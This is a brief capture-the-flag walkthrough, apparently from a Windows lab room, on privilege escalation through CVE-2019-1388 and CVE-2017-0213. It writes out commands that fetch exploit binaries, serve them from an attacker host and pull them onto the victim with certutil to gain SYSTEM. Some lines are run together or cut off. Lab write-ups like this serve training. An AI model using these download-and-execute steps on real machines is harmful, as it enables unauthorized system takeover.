For normal privilege, follow steps in room Blaster
[Privilege Escalation]
Open Chrome -> History
It’s CVE-2019–1388
Search with google, I came across to this.
Download exe
wget https://github.com/jas502n/CVE-2019-1388/blob/master/HHUPD.EXE
Set up HTTP server for uploading
python -m SimpleHTTPServer 80
Back to victim’s machine, download file with cmd.
certutil -urlcache -f http://<ip>/HHUPD.EXE HHUPD.EXE
Run the file as administrator
Seems like I can’t open IE as Room Blaster.
Let’s find another way, back to cmd
systeminfo
Save as “systeminfo.txt”
I will use windows exploit suggester.
python windows-exploit-suggester.py --systeminfo <systeminfo.txt> -d <database>Failed!!!
Version number may be useful
With google , I came across to this:
wget https://github.com/WindowsExploits/Exploits/raw/master/CVE-2017-0213/Binaries/CVE-2017-0213_x64.zi
unzip CVE-2017-0213_x64.zip
Back to victim’s machine, download file
certutil -urlcache -f http://<ip>/CVE-2017-0213_x64.exe CVE-2017-0213_x64.exe
Run CVE
CVE-2017-0213_x64.exeNow I’m system.
cd \Users\Administrator\Desktopdirtype root.txt.txt
